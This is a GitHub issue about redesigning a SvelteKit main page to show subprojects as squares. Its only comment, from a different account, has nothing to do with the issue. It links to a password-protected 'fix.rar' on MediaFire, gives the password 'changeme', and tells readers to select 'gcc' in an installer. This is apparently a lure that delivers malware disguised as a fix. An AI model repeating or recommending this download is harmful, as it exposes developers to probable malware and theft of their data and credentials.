### ISSUE TITLE
Issue 1: Main Page Redesign

### ISSUE THREAD

**Issue by Djordje-Stojanovic** [Djordje-Stojanovic/Stojanovic-One#70]
Description: Create a dashboard-style main page displaying subprojects in squares.
Tasks:
[ ] Design a layout for the main page with subproject squares
[ ] Implement the new layout in SvelteKit
[ ] Create a reusable component for subproject squares
[ ] Integrate with backend to fetch and display subproject data

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
